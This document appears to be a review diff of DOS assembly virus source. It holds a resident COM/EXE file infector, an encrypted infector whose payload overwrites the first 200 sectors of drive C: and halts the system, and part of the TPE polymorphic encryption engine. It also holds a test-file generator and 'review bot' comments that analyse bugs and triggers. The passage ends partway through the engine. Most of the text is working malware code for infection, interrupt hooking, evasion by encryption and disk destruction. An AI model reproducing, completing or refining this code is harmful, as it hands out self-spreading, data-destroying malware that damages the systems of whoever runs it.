mov cs:[ES_Save],es
cmp ax,0F1F1h ;AX preserved?
je Already_Installed ;Same? go Already_Installed
jmp Install_Virus ;Not In Mem? go Install_Virus
Already_Installed: ;Restore control to host file (COM)
mov ax,cs
mov es,ax ;ES = DS = CS
mov ds,ax
mov ah,0CBh ;Restore Control
mov si,700h ;Offset of host in file
mov di,100h ;Original offset of host
mov cx,cs:[File_Size_Off] ;Size of host file
int 21h ;Call internal routine to restore control
;to host .COM file.
;************************************************************************
;* Virus Entry Point #2 (EXE) *
;************************************************************************
EXE_Entry_Point:
mov ax,cs
sub ax,10h
push ax
mov ax,offset After_Jump
push ax
retf ;Jump to After_Jump with
;original .COM offsets.
After_Jump:
mov cs:[ES_Save],es
mov cs:[DS_Save],ds
mov ax,0F1F1h
int 21h
cmp ax,0F1F1h ;Check if installed.
jne Get_New_Seg ;Nope, Install....
cli
mov ax,cs:[SS_Save] ;Yes, restore host regs
add ax,10h
mov bx,es
add ax,bx
mov ss,ax
mov sp,cs:[SP_Save]
sti
mov ax,cs:[CS_Store]
mov bx,es
add ax,bx
add ax,10h
mov word ptr cs:[IP_Save+2],ax
jmp dword ptr cs:[IP_Save] ;Restore Control to
;.EXE host.
Get_New_Seg:
push es ;For later RETF
xor ax,ax
mov ds,ax ;DS = 0
;****************************************************************************
;*NOTE: From 0:200 to 0:400 there is some "empty" space, as it is the upper *
;* (unused) part of the interrupt tables. This virus uses the top three*
;* bytes, i.e. the INT 99 entry, to run a repnz movsb command followed *
;* by a retf. This is to copy the virus to a new segment in memory and*
;* jump to it. *
;****************************************************************************
mov word ptr ds:[3fdh],0A4F3h ;repnz movsb
mov byte ptr ds:[3ffh],0CBh ;retf
push cs
pop ds
mov si,100h
mov di,si ;Copy virus to new segment
mov cx,600h ;and "RETF" to
mov ax,offset Install_Virus ;Install_Virus in new copy
push ax
db 0EAh,0FDh, 03h, 00h, 00h ;Jump far 0:3FDh
Install_Virus:
cli ;Disable interrupts
push cs
pop ds
mov ah,2Ah
int 21h ;Get Day/Date
cmp al,6 ;Is it Saturday?
jne Set_Int_21 ;Nope, don't activate, just
mov ax,3508h ;infect files.
int 21h ;Get Int 08 address
mov word ptr cs:[IP_08],bx
mov word ptr cs:[CS_08],es
mov dx,offset Int_08
mov ax,2508h
int 21h ;Set Int 08
Set_Int_21:
mov ax,3521h
int 21h ;Get Int 21 address
mov word ptr cs:[IP_21],bx
mov word ptr cs:[CS_21],es
mov dx,offset Int_21
mov ax,2521h
int 21h ;Set Int_21
mov es,cs:[ES_Save]
cmp cs:[TSR_DAT],426Bh ;Second Execute?
je Go_TSR ;Yep, go TSR
mov bx,1000h ;Nope, set up for second exec.
mov ah,4Ah
int 21h ;Change Mem Allocation
;to 64k.
mov es,es:[2ch] ;Environment string
xor di,di
xor al,al
mov cx,7FFFh
Find_Filename: ;Search Environment for
repne scasb ;filename of host.
cmp es:[di],al
loopnz Find_Filename
add di,3 ;Skip drive designator
;i.e. "C:\" in
;"C:\Infected.EXE"
mov dx,di
push es
pop ds ;DS:DX = host filename
push cs
pop es
cli ;Clears Ints (so none can
;disrupt second execution
;of virus)
mov ax,cs:[ES_Save]
mov cs:[ES_Store_1],ax
mov cs:[ES_Store_2],ax
mov cs:[ES_Store_3],ax
mov bx,144h
mov ax,4B00h ;Re-Execute the file
pushf
call dword ptr cs:[IP_21] ;Call Int 21 to Execute file.
Go_TSR:
mov ah,31h
mov dx,71h
int 21h ;Terminate and Stay Resident.
Int_21:
pushf ;Push flags
cmp ax,0F1F1h ;Is it an Install Check?
jne Is_It_Execute ;No, Go Is_It_Execute
mov ax,0F1F1h ;Yes, save value (unneccesary)
popf
iret ;Return to virus in program.
Is_It_Execute:
cmp ax,4B00h ;Is it a Load & Execute call?
jne Restore_Host ;Nope, continue on.
call execute ;Infect the file if possible.
jmp short Go_Int_21 ;And go to old Int 21 handler.
nop
Restore_Host:
cmp ah,0CBh ;Is it a request to restore
jne Go_Int_21 ;control to host?
pop ax ax ;Pop flags + Old IP (not kept)
mov word ptr cs:[IP_Save],100h
pop ax
mov word ptr cs:[IP_Save+2],ax
rep movsb ;Restore Host to orig. Pos.
popf ;Completely remove old Int call
mov ax,0
jmp dword ptr cs:[IP_Save] ;Jump to Host:100
Go_Int_21:
popf ; Pop flags
db 0ea ;Jump to Int 21
IP_21 dw 040ebh
CS_21 dw 0011
execute:
push es ds ax bx cx dx si di
mov cs:[File_Name_Seg],ds
mov cs:[File_Name_Off],dx
mov ax,3524h ;Get Int 24 Address
int 21h ;(Critical Error)
mov cs:[IP_24],bx
mov cs:[CS_24],es
push cs
pop ds
mov dx,offset Int_24
mov ax,2524h
int 21h ;Set Int 24
mov ds,cs:[File_Name_Seg]
mov si,cs:[File_Name_Off]
Name_Check:
lodsb
or al,al ;Is the first byte a zero?
jnz Name_Check ;Nope, find end of string
mov al,[si-2]
and al,0DFh
cmp al,4Dh ;'M'
je Is_Com ;COM file, jump Is_Com
cmp al,45h ;'E'
je Is_EXE ;EXE file, jump Is_EXE
jmp Clean_Up ;Neither? Go Clean_Up
Is_Com:
mov cs:[File_Type],'C' ;Save File type for later.
jmp short Check_If_Command
nop
Is_EXE:
mov cs:[File_Type],'E'
Check_If_Command:
sub si,0Ch
mov di,offset Command
push cs
pop es
mov cx,0Bh ;Is it Command.COM?
repe cmpsb
jnz Start_Infect ;No, Jump Start_Infect
Got_An_Error:
jmp Clean_Up ;Is Command, get otta here.
Start_Infect:
mov ds,cs:[File_Name_Seg]
mov dx,cs:[File_Name_Off]
mov ax,4300h
int 21h ;Get Attribs
jc Got_An_Error
mov cs:[File_Attribs],cx
xor cx,cx
mov ax,4301h
int 21h ;Zero Attrib's for read/write
jc Got_An_Error
mov ax,3D02h
int 21h ;Open Read/Write
jnc Check_Infect ;Everything Fine? go Check_Infect
jmp Reset_Attribs ;Couldn't Open, go Reset_Attribs
Check_Infect:
mov bx,ax
mov cs:[File_Handle],ax
mov cx,0FFFFh
mov dx,0FFFCh
mov ax,4202h
int 21h ;Move to 4 bytes from end
add ax,4
mov cs:[File_Size_Off],ax
push cs
pop ds
mov dx,offset Buffer_For_Checks
mov cx,4
mov ah,3Fh
int 21h
;Read in Last 4 bytes of file
push cs
pop es
mov cx,4
mov si,offset Marker ;are last 4 bytes 'YTIT'?
mov di,offset Buffer_For_Checks ;
repe cmpsb
jnz Check_Which_Type ;Not infected? Go Check_Which_Type
jmp Close_File ;Infected? Go Close_File
Check_Which_Type:
cmp cs:[File_Type],'C' ;Is it a .COM?
je COM_Infect ;Yes, go COM_Infect
jmp EXE_Infect ;No, go EXE_Infect
COM_Infect:
mov ah,48h
mov bx,1000h
int 21h ;Allocate 64k of memory
jnc Load_In_File ;No Prob? Go Load_In_File
jmp Close_File ;Otherwise, go Close_File
Load_In_File:
mov cs:[Mem_Seg],ax
mov bx,cs:[File_Handle]
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h ;Go to beginning of file
push cs
pop ds
mov es,cs:[Mem_Seg]
mov si,100
mov di,si
mov cx,700h
rep movsb
mov ds,cs:Mem_Seg
mov cx,cs:[File_Size_Off]
mov dx,700h
mov ah,3Fh ;Load entire file to directly
int 21h ;after virus.
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h ;Move to the beginning of file
mov dx,100h
mov cx,cs:[File_Size_Off]
add cx,600h
mov ah,40h
int 21h ;Write entire file back to disk
jc Go_Release_Mem
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ;Move to end of file
mov cs:[File_Size_Seg],0 ;COM < 64k
add ax,4 ;Add 4 for marker bytes
mov cs:[File_Size_Off],ax ;Save file size
push cs
pop ds
mov dx,offset Marker
mov cx,4
mov ah,40h
int 21h ;Write in marker 'YTIT'
Go_Release_Mem:
jmp Release_Mem
jmp Close_File
EXE_Infect:
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h ;Move to beginning of file
push cs
pop ds
db 8dh,16h,1bh,01 ;lea dx,cs:[11Bh]
mov cx,1Ch
mov ah,3Fh
int 21h ;Read in .EXE header
Save_Header_NFO:
cli ;clear ints
mov ax,cs:[Init_CS]
mov cs:[CS_Store],ax ;Save old CS
mov ax,cs:[Init_IP]
mov word ptr cs:[IP_Save],ax ;Save old IP
mov ax,cs:[Init_SS]
mov cs:[SS_Save],ax ;Save old SS
mov ax,cs:[Init_SP]
mov cs:[SP_Save],ax ;Save old SP
sti ;restore ints
xor ax,ax
cmp cs:[Last_Page_Len],0
je Calculate_Exe_Header
dec cs:[EXE_Size]
Calculate_Exe_Header: ;Long, drawn out way
;to calculate new EXE header
mov cx,200h
xor dx,dx
mov ax,cs:[EXE_Size]
mul cx
add ax,cs:[Last_Page_Len]
add ax,0Fh
adc dx,0
and ax,0FFF0h
mov cs:[File_Size_Off],ax
mov cs:[File_Size_Seg],dx
push dx ax dx ax
xor dx,dx
mov ax,cs:[Header_Size]
mov cx,10h
mul cx
pop bx cx
sub bx,ax
sbb cx,dx
xchg ax,bx
xchg dx,cx
mov cx,10h
div cx
mov cs:[Init_CS],ax
mov cs:[Init_SS],ax
mov cs:[Init_SP],700h
mov cs:[Init_IP],offset EXE_Entry_Point-100
pop ax dx
push dx ax
add ax,604h
adc dx,0
mov cx,200h
div cx
mov cs:Last_Page_Len,dx
or dx,dx
jz Rewrite_Header
inc ax
Rewrite_Header:
mov cs:[EXE_Size],ax
xor cx,cx
xor dx,dx
mov bx,cs:[File_Handle]
mov ax,4200h
int 21h ;Move back to beginning of file
push cs
pop ds
mov dx,offset EXE_Sig
mov cx,1Ch
mov ah,40h
int 21h ;Write EXE header back to file
pop dx
pop cx
jc Close_File
mov ax,4200h
int 21h ;Go to end of host.
push cs
pop ds
mov dx,100
mov cx,600h
mov ah,40h
int 21h ;Write Virus
jc Close_File
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ;Go to end of file.
mov dx,offset Marker
mov cx,4
mov ah,40h
int 21h ;Write marker byte.
jmp short Close_File
nop
Release_Mem:
mov es,cs:Mem_Seg
mov ah,49h
int 21h ;Release Memory
Close_File:
mov ah,3Eh
mov bx,cs:[File_Handle]
int 21h ;Close file.
Reset_Attribs:
mov ds,cs:File_Name_Seg
mov dx,cs:File_Name_Off
mov cx,cs:File_Attribs
mov ax,4301h
int 21h ;Reset File attributes
Clean_Up:
mov ds,cs:[CS_24] ;Restore Critical Error
mov dx,cs:[IP_24]
mov ax,2524h
int 21h
pop di si dx cx bx ax ds es
retn
Int_24: ;Critical Error Handler
xor ax,ax
iret
Int_08: ;Timer Click Handler
pushf
inc cs:[Activation_Counter]
cmp cs:[Activation_Counter],0CCCh
jne Go_Int_08
mov cs:[Activation_Counter],0 ;Reset Counter
push ds es si di ax bx cx dx
call Get_Mode
call Scroll_Area
call Print_Message
pop dx cx bx ax di si es ds
Go_Int_08:
popf ; Pop flags
db 0EA
IP_08 dw 003Ch
CS_08 dw 0D80h
Screen_Width dw 0
Activation_Counter dw 1E0h
Get_Mode:
mov ah,0Fh
int 10h ;Get Video Mode
mov bx,0B000h ;Mode 7 Text Video Memory
mov es,bx
cmp al,7
je In_Mode_7
mov bx,0B800h ;Regular Text Video Memory
In_Mode_7:
mov es,bx
mov ds,bx
mov cs:[Screen_Width],4Fh
Setup_Screen:
mov cx,19h
mov bx,0
Clear_Screen:
push cx
call Scroll_Line
add bx,0A0h
pop cx
loop Clear_Screen
dec cs:[Screen_Width]
jnz Setup_Screen
retn
Scroll_Line: ;This subroutine clears the
mov di,bx ;screen by scrolling the text
mov si,bx ;straight off of the left
add si,2 ;side.
mov cx,cs:[Screen_Width]
Scroll_Sideways:
lodsb
stosb
inc si
inc di
loop Scroll_Sideways
retn
Print_Message:
xor bx,bx
push cs
pop ds
db 8dh,36h,18h,06 ;lea si,cs:[Totoro_Design]
mov ah,0Eh
Print_Loop:
lodsb
int 10h ;Write Char in Teletype mode
cmp byte ptr [si],24h ;is it a '$'?
jne Print_Loop ;Nope, continue writing
retn
Scroll_Area:
xor bx,bx ;Video Page 0
mov ah,3
int 10h ;Get Cursor info
push dx ;Push Cursor Location (DX)
mov ah,6
mov bh,7
mov al,18h
xor cx,cx
mov dh,18h
mov dl,4Fh
int 10h ;Scroll up (clear screen)
mov ah,2
pop dx
sub dh,2
xor bx,bx
int 10h ;Reset Cursor
xor bx,bx
xor dx,dx
mov ah,2
int 10h ;Set Cursor for printing.
retn
Totoro_Design:
db ' ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·',0Dh, 0Ah
db ' º Totoro Dragon º',0Dh, 0Ah
db ' ºHello! I am TOTORO CATº',0Dh, 0Ah
db ' º Written by Y.T.J.C.T º',0Dh, 0Ah
db ' º in Ping Tung. TAIWAN º',0Dh, 0Ah
db ' º Don''t Worry,be Happy º',0Dh, 0Ah
db ' ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ$'
Marker db 'YTIT'
db 28 dup (0)
;***************************************************************************
;*End of virus. The bytes below this line are the infected program and the *
;* viruses' identification bytes. *
;***************************************************************************
Host_Program:
mov ax,4c00
int 21
Infected_Mark db 'YTIT'
end start
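Review bot: The analysis comment above `mov word ptr ds:[3fdh],0A4F3h` misidentifies both the vector and the instruction: 0:3FDh–0:3FFh are the last three bytes of the INT 0FFh entry (INT 99h lives at 0:264h), and the word 0A4F3h is stored as F3 A4, which is `rep movsb`, not `repnz movsb` (that would be F2 A4). Suggested replacements: `;Last 3 bytes of the INT 0FFh vector (0:3FCh)` for the block note and `;F3 A4 = rep movsb` on that line; the far jump encoded as `db 0EAh,0FDh,03h,00h,00h` targets the same bytes. This matters because the prose is what an analyst or signature writer will trust over the opcodes. The header block could also name the in-memory identifier the code already exposes, `ax=0F1F1h` returned unchanged from INT 21h, next to the 'YTIT' file marker it already lists.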

@ -0,0 +1,381 @@
; toys.asm : Unknown by Unknown
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
id = 'FZ' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: loop decrypt ; handles encryption and decryption
patch_startencrypt:
mov si,offset startencrypt ; start of decryption
mov dx,(offset heap - offset startencrypt)/2 ; iterations
decrypt_loop:
db 2eh,81h,34h ; xor word ptr cs:[si], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc si ; calculate new decryption location
inc si
dec dx ; If we are not done, then
jnz decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
cmp sp,id ; COM or EXE?
je restoreEXE
restoreCOM:
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreEXIT:
movsw
mov byte ptr [bp+numinfec],2 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
dir_scan: ; "dot dot" traversal
lea dx,[bp+exe_mask]
call infect_mask
lea dx,[bp+com_mask]
call infect_mask
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
done_infections:
mov ah,2ah ; Get current date
int 21h
cmp dh,6 ; Check month
cmp dl,19 ; Check date
jb exit_virus
cmp al,-1 ; Check date of week
jz activate
mov ah,2ch ; Get current time
int 21h
cmp ch,18 ; Check the hour
jnz exit_virus
cmp cl,-1 ; Check the minute
jnz exit_virus
cmp dh,-1 ; Check the seconds
jnz exit_virus
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 21h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 db ? ; Actually four bytes
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
stacksave2 dd ?
activate: mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
mov ax,0002h ; First argument is 2
mov cx,00C8h ; Second argument is 200
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts
cli ; Clear the interrupt flag
hlt ; HaLT the computer
jmp short $ ; Just to make sure
jmp exit_virus
data00 db 10,13,"All my toys are broken",13,10
db "And so am I inside.",13,10
db "The carnival has closed",13,10
db "Years ago...",13,10,0
;creator db '[MPC]',0 ; Mass Produced Code Generator
infect_mask:
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc exit_infect_mask ; No mo files found
mov al,0h ; Open read only
call open
mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ah,3eh ; Close file
int 21h
cmp word ptr [bp+buffer],'ZM'; EXE?
jz checkEXE ; Why yes, yes it is!
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
cmp ax,50000 ; Is it too large?
ja find_next
mov bx,word ptr [bp+buffer+1]; get jmp location
add bx,heap-decrypt+3 ; Adjust for virus size
cmp ax,bx
je find_next ; already infected
jmp infect_com
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
exit_infect_mask: ret
infect_exe:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id
pop dx ; get file length
pop ax
add ax, heap-decrypt ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
push word ptr [bp+buffer+14h] ; needed later
mov cx, 1ah
jmp short finishinfection
infect_com: ; ax = filesize
mov cx,3
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
push ax ; needed later
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov al,2
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+code_store]
mov ax,5355h ; push bp,push bx
stosw
lea si,[bp+decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
lea si,[bp+write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop dx ; Entry point of virus
push di
push si
push cx
rep movsb ; Copy decryption function
mov ax,5b5dh ; pop bx,pop bp
stosw
mov al,0c3h ; retn
stosb
add dx,offset startencrypt - offset decrypt ; Calculate new
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
dec byte ptr [bp+numinfec] ; One mo infection
jnz mo_infections ; Not enough
pop ax ; remove call from stack
jmp done_infections
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bx ; Restore file handle
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bx
push bp
endwrite:
int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return control
exe_mask db '*.exe',0
com_mask db '*.com',0
dot_dot db '..',0
heap: ; Variables not in code
; The following code is the buffer for the write function
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
origdir db 64 dup (?) ; Current directory buffer
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point
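Review bot: The header says nothing about the payload, and the trigger logic in done_infections cannot fire as written: the `cmp dh,6` month result is thrown away by the following `cmp dl,19`, `cmp al,-1` tests a 0–6 day-of-week value against 0FFh, and `cmp cl,-1` does the same for minutes, so every path reaches exit_virus and the `activate` routine (INT 26h absolute write of 0C8h sectors starting at sector 0 of drive 2 = C:, followed by `hlt`) is unreachable from this entry sequence. A header comment should record that so a reader judging severity does not take the message text and disk-write code at face value, e.g. `; Payload: prints data00 and overwrites the first 200 sectors of C: via INT 26h; unreachable with the generated trigger (day/minute compared against -1).` The -1 values presumably come through from the MPC template named in the header, but that is an inference from the "Unknown by Unknown" line rather than something the listing shows.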

@ -0,0 +1,101 @@
;----------------------------------------------------------------------------
; TPE-GEN - This program generates 50 TPE encrypted test files
;
; This source can be compiled with MASM 5.0 or TASM 2.01
; (and perhaps others too, but this is not tested.)
;----------------------------------------------------------------------------
.model tiny
.RADIX 16
.code
extrn crypt:near ;external routines in engine
extrn rnd_get:near
extrn rnd_init:near
org 0100
begin: call rnd_init ;init. random number generator
mov dx,offset starttxt ;print message
mov ah,09
int 21
mov cx,50d ;repeat 50 times
lop: push cx
mov ah,3C ;create a new file
mov dx,offset filename
mov cx,0020
int 21
xchg ax,bx
push ds
push es
push bx
mov ax,cs ;input parameters for engine
mov ds,ax
add ax,0400
mov es,ax ;ES = DS + 400h
xor si,si ;code will be right after decr.
mov dx,offset hello ;this will be encrtypted
mov cx,100d ;length of code to encrypt
mov bp,0100 ;decryptor will start at 100h
call rnd_get ;AX register will be random
call crypt ;call the engine
pop bx ;write crypted file
mov ah,40
int 21
mov ah,3E ;close the file
int 21
pop es
pop ds
mov di,offset filename ;adjust name for next file
mov bx,7 ; (increment number)
incnum: inc byte ptr ds:[bx+di]
cmp byte ptr ds:[bx+di],'9'
jbe numok
mov byte ptr ds:[bx+di],'0'
dec bx
jnz incnum
numok: pop cx ;do it again...
loop lop
exit: int 20
;----------------------------------------------------------------------------
; Text and data
;----------------------------------------------------------------------------
starttxt db 'TPE-GEN - Generates 50 TPE encrypted test files.'
db 0Dh, 0Ah, '$'
filename db '00000000.COM',0
;----------------------------------------------------------------------------
; The small test file that will be encrypted
;----------------------------------------------------------------------------
hello: call next ;get relative offset
next: pop dx
add dx,10d ;find begin of message
mov ah,09 ;print message
int 21
int 20
db 'Hello, world!', 0Dh, 0A, '$'
db (100d) dup (90)
end begin
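Review bot: The create call at `mov ah,3C` / `int 21` never tests CF, so if the create fails (read-only directory, full disk, handle table exhausted) the error code left in AX is taken as a file handle by `xchg ax,bx`, and the later write and close are issued against that handle. A `jc exit` immediately after that `int 21` is enough for a test generator, since `exit` terminates with INT 20h regardless of the pushed CX. The per-file parameters handed to crypt (ES = DS+400h work segment, DS:DX code, CX length, BP start offset, SI distance) match the engine's documented inputs, so the call contract itself looks consistent.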



@ -0,0 +1,990 @@
.radix 16
;-----------------------------------------------------------------------------
;
; TPE v1.2 Source Code
; --------------------
;
; Extracted from Coffee Shop virus by: Lucifer Messiah -- ANARKICK SYSTEMS
;
;-----------------------------------------------------------------------------
.model tiny
.code
public rnd_init
public rnd_get
public crypt
public tpe_bottom
public tpe_top
;****************************************************************************
;* Data area for engine
;****************************************************************************
org 0e0
TPE12:
add_val dw 0
xor_val dw 0
xor_offset dw 0
where_len dw 0
where_len2 dw 0
flags db 0
;****************************************************************************
;* Begin of virus, installation in memory
;****************************************************************************
org 0100
;****************************************************************************
;* Insert virus code here, or compile and link to virus
;****************************************************************************
;****************************************************************************
;*
;* Encryption Engine
;*
;*
;* Input: ES work segment
;* DS:DX code to encrypt
;* BP what will be start of decryptor
;* SI what will be distance between decryptor and code
;* CX length of code
;* AX flags: bit 0: DS will not be equal to CS
;* bit 1: insert random instructions
;* bit 2: put junk before decryptor
;* bit 3: preserve AX with decryptor
;*
;* Output: ES: work segment (preserved)
;* DS:DX decryptor + encrypted code
;* BP what will be start of decryptor (preserved)
;* DI length of decryptor / offset of encrypted code
;* CX length of decryptor + encrypted code
;* AX length of encrypted code
;* (other registers may be trashed)
;*
;****************************************************************************
tpe_top equ $
db '[ MK / Trident ]'
crypt:
xor di,di ;di = start of decryptor
push dx ;save offset of code
push si ;save future offset of code
mov byte ptr ds:[flags],al ;save flags
test al,8 ;push AX?
jz no_push
mov al,50
stosb
no_push: call rnd_get ;add a few bytes to cx
and ax,1F
add cx,ax
push cx ;save length of code
call rnd_get ;get random flags
xchg ax,bx
;BX flags:
;0,1 how to encrypt
;2,3 which register for encryption
;4 use byte or word for encrypt
;5 MOV AL, MOV AH or MOV AX
;6 MOV CL, MOV CH or MOV CX
;7 AX or DX
;8 count up or down
;9 ADD/SUB/INC/DEC or CMPSW/SCASW
;A ADD/SUB or INC/DEC
; CMPSW or SCASW
;B offset in XOR instruction?
;C LOOPNZ or LOOP
; SUB CX or DEC CX
;D carry with crypt ADD/SUB
;E carry with inc ADD/SUB
;F XOR instruction value or AX/DX
random: call rnd_get ;get random encryption value
or al,al
jz random ;again if 0
mov ds:[xor_val],ax
call do_junk ;insert random instructions
pop cx
mov ax,0111 ;make flags to remember which
test bl,20 ; MOV instructions are used
jnz z0
xor al,07
z0: test bl,0C
jnz z1
xor al,70
z1: test bl,40
jnz z2
xor ah,7
z2: test bl,10
jnz z3
and al,73
z3: test bh,80
jnz z4
and al,70
z4: mov dx,ax
mov_lup: call rnd_get ;put MOV instructions in
and ax,000F ; a random order
cmp al,0A
ja mov_lup
mov si,ax
push cx ;test if MOV already done
xchg ax,cx
mov ax,1
shl ax,cl
mov cx,ax
and cx,dx
pop cx
jz mov_lup
xor dx,ax ;remember which MOV done
push dx
call do_mov ;insert MOV instruction
call do_nop ;insert a random NOP
pop dx
or dx,dx ;all MOVs done?
jnz mov_lup
push di ;save start of decryptor loop
call do_add_ax ;add a value to AX in loop?
call do_nop
test bh,20 ;carry with ADD/SUB ?
jz no_clc
mov al,0F8
stosb
no_clc: mov word ptr ds:[xor_offset],0
call do_xor ;place all loop instructions
call do_nop
call do_add
pop dx ;get start of decryptor loop
call do_loop
test byte ptr ds:[flags],8 ;insert POP AX ?
jz no_pop
mov al,58
stosb
no_pop: xor ax,ax ;calculate loop offset
test bh,1 ;up or down?
jz v1
mov ax,cx
dec ax
test bl,10 ;encrypt with byte or word?
jz v1
and al,0FE
v1: add ax,di
add ax,bp
pop si
add ax,si
sub ax,word ptr ds:[xor_offset]
mov si,word ptr ds:[where_len]
test bl,0C ;are BL,BH used for encryption?
jnz v2
mov byte ptr es:[si],al
mov si,word ptr ds:[where_len2]
mov byte ptr es:[si],ah
jmp short v3
v2: mov word ptr es:[si],ax
v3: mov dx,word ptr ds:[xor_val] ;encryption value
pop si ;ds:si = start of code
push di ;save ptr to encrypted code
push cx ;save length of encrypted code
test bl,10 ;byte or word?
jz blup
inc cx ;cx = # of crypts (words)
shr cx,1
lup: lodsw ;encrypt code (words)
call do_encrypt
stosw
loop lup
jmp short klaar
blup: lodsb ;encrypt code (bytes)
xor dh,dh
call do_encrypt
stosb
loop blup
klaar: mov cx,di ;cx = length decryptpr + code
